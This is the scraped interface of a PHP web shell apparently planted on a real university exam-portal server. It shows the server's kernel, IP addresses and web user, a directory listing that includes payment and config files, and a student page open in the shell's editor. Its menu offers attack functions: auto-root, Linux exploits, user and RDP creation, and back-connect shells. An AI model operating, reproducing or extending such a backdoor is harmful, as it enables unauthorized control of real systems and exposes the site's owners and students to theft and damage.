Linux ip-172-26-7-228 5.4.0-1103-aws #111~18.04.1-Ubuntu SMP Tue May 23 20:04:10 UTC 2023 x86_64
Apache
: 172.26.7.228 | : 3.145.110.145
Cant Read [ /etc/named.conf ]
5.6.40-24+ubuntu18.04.1+deb.sury.org+1
www-data
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
student /
sikkim /
[ HOME SHELL ]
Name
Size
Permission
Action
css
[ DIR ]
drwxr-xr-x
easy_zip
[ DIR ]
drwxr-xr-x
img
[ DIR ]
drwxr-xr-x
jquery-ui-1.9
[ DIR ]
drwxr-xr-x
js
[ DIR ]
drwxr-xr-x
libs
[ DIR ]
drwxr-xr-x
links
[ DIR ]
drwxr-xr-x
src
[ DIR ]
drwxr-xr-x
tarka_pdf
[ DIR ]
drwxr-xr-x
tcpdf
[ DIR ]
drwxr-xr-x
app.php
416
B
-rwxr-xr-x
candidate_list.html
4.9
KB
-rwxr-xr-x
cconfig.php
1.18
KB
-rwxr-xr-x
cconfig_old.php
1.13
KB
-rwxr-xr-x
index.php
4.47
KB
-rwxr-xr-x
mcverify.php
473
B
-rw-rw-r--
payment_gate_way_responce.php
6.51
KB
-rwxr-xr-x
payment_gateway.php
7.85
KB
-rwxr-xr-x
phpinfo.php
11.82
KB
-rwxr-xr-x
student.php
3.23
KB
-rwxr-xr-x
student22.php
3.23
KB
-rwxr-xr-x
student_old.php
3.26
KB
-rwxr-xr-x
subjectDetails.php
1.14
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : student22.php
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <link rel="shortcut icon" type="image/jpg" href="img/favicon.jpg" /> <?php require_once("links/js_files.php");?> <script src="js/candidate_list.js"></script> <script type="text/javascript"> $(function(){ $('.index_label_div').corner("5px").css("border","1px solid #336699"); $('.messageboard-div').corner("5px").css("border","1px solid #336699"); $('.submit_div_button').corner("5px"); $('.div_app_form_center_blue').corner("5px").css("border","1px solid #336699"); $('#tabs').tabs(); $('.ui-tabs .ui-tabs-nav li a').corner("tl tr"); $("#guidelines").load("links/guidelines.html?v=17062202"); OnloadCall() function OnloadCall() { url_object=GetUrlParameters(); var r=url_object['r']; var c=url_object['c']; var li=url_object['li']; $("#result_error_div").hide(); DisplayStudentSubjectDetails(r,c,li); } }); </script> </head> <body> <div id='main_frame'> <div class='header_main_div'> <?php require_once("links/header.php");?> <div style='height:auto;overflow:auto;background:#FFFFFF;'> <div style="margin-top: 6px; border-bottom: solid 1px #979595; font-size: 12px; font-weight: bold;height:29px;background:#FFFFFF;" > <div id="ContentPlaceHolder1_resultDate" style='float:left;'> <div style="height: 20px; width: 314px; text-align: left;float:left; padding-left: 10px; padding-top: 7px; color: Red" id="ResultpersonalLeftDiv"> <span style="font-weight: bold;" id="ContentPlaceHolder1_lblDate"> </span> </div> </div> <div id="ContentPlaceHolder1_lastDate"> <div style="height: 20px; width: 600px; float: right; text-align: right; padding-right: 10px; padding-top: 12px; color: Red" id="ResultpersonalRightDiv"> <span style="font-weight: bold;" id="ContentPlaceHolder1_lblExmLastDate"></span> </div> </div> </div> <div style ="width:900px;clear:both;font-size:15px;padding-left:20px;"><b>For any clarifications on exam application form kindly send a mail to <span style = 'color:blue'>suexam@cus.ac.in</span></b></div> <div id='tabs' style = "clear:both;"> <ul> <li><a href='#guidelines'>Guidelines for Students</a></li> <li><a href='#index_main_page_result' >Exam Details</a></li> <li><a href='#applications'onclick='javascript:DisplayApplications();' >Your Applications</a></li> <li id='downloadAdm'><a href='#applications' onclick='javascript:GenerateAdmissionTicket();' >Download Hall Ticket</a></li> </ul> <div id="index_main_page_result"> <div id='result_error_div' style='display:none;'> </div> <div id='result_success_div'></div> </div> <div id="guidelines" style='min-height:200px;overflow:auto;'></div> <div id="applications" style='min-height:200px;'> </div> </div> <?php require_once("links/footer.php");?> </div> </div> </div> </br> </body> </html>
Close